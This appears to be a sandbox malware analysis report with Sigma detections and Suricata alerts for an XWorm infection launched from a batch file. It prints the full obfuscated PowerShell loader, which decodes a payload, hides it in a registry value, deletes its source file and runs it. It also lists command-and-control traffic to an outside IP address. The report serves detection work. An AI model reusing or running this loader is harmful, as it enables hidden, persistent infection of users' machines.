CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2780, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", ProcessId: 332, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, CommandLine: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7612, ProcessCommandLine: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, ProcessId: 7632, ProcessName: powershell.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, CommandLine: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 7612, ProcessCommandLine: powershell.exe -windowstyle hidden -ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACcAKQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBFAHgAcABhAG4AZABQAHIAbwBwAGUAcgB0AHkAIABgACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgB4ACkA, ProcessId: 7632, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\georgefloyd.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2780, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:tMHryVWCxy;$path = $path.Trim();try {$_1 = Get-Content -Path $path.Substring(1, $path.Length - 2) -ErrorAction Stop;} catch {$_1 = Get-Content -Path $path}$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name '$phantom-frZZfx' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", ProcessId: 332, ProcessName: powershell.exe

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Suricata Signatures

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:18:41.790973+0100	2853685	1	A Network Trojan was detected	192.168.2.6	49687	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:18:59.552890+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:10.004452+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:12.206804+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:24.877789+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:37.574662+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:40.004656+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:49.520379+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:54.690029+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:54.781647+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:55.068365+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:56.261572+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49692	TCP
2025-03-07T17:20:04.911144+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:05.011901+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:05.322067+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:06.565378+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:06.664036+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:10.003568+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:19.319436+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:31.974613+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:40.022332+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:44.648533+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:57.317521+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:10.035914+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:10.332799+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:10.482556+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:10.930517+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:11.826591+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:13.614468+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:17.331382+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:24.498739+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:38.834655+0100	2852870	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:18:59.595407+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:19:12.208830+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:19:24.880831+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:19:37.576642+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:19:48.957561+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.098497+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.241743+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.382974+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.520113+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.558520+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:19:49.662414+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.801744+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.942178+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.082810+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.238965+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.363797+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.489252+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.629611+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.754516+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.879825+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.020113+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.145327+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.270134+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.397309+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.521849+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.645150+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.770950+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.895488+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.035780+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.196525+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.332633+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.488879+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.613967+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.770143+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:52.908138+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.035749+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.180330+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.317079+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.474802+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.599653+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.755882+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:53.890904+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.020085+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.177107+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.317369+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.473259+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.625536+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.691690+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:19:54.770179+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:54.825743+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:19:54.926407+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.051455+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.091019+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:19:55.191993+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.362996+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.491023+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.631065+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.789012+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:55.926516+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:56.067198+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:56.207835+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:20:04.914952+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:05.013440+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:05.120026+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:05.132978+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:05.225043+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:05.327150+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:05.429315+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:05.437052+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:06.566482+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:06.664693+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:19.321088+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:31.977112+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:44.654213+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP
2025-03-07T17:20:57.327945+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.6	49688	193.32.177.63	6000	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:19:10.004452+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:19:40.004656+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:10.003568+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:20:40.022332+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:10.035914+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:10.332799+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:10.482556+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:10.930517+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:11.826591+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:13.614468+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:17.331382+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:24.498739+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP
2025-03-07T17:21:38.834655+0100	2852874	1	Malware Command and Control Activity Detected	193.32.177.63	6000	192.168.2.6	49688	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T17:19:48.957561+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.098497+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.241743+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.382974+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.520113+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.662414+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.801744+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:49.942178+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.082810+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.238965+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.363797+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.489252+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.629611+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.754516+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:50.879825+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.020113+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.145327+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.270134+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
2025-03-07T17:19:51.397309+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.6	49692	193.32.177.63	6000	TCP
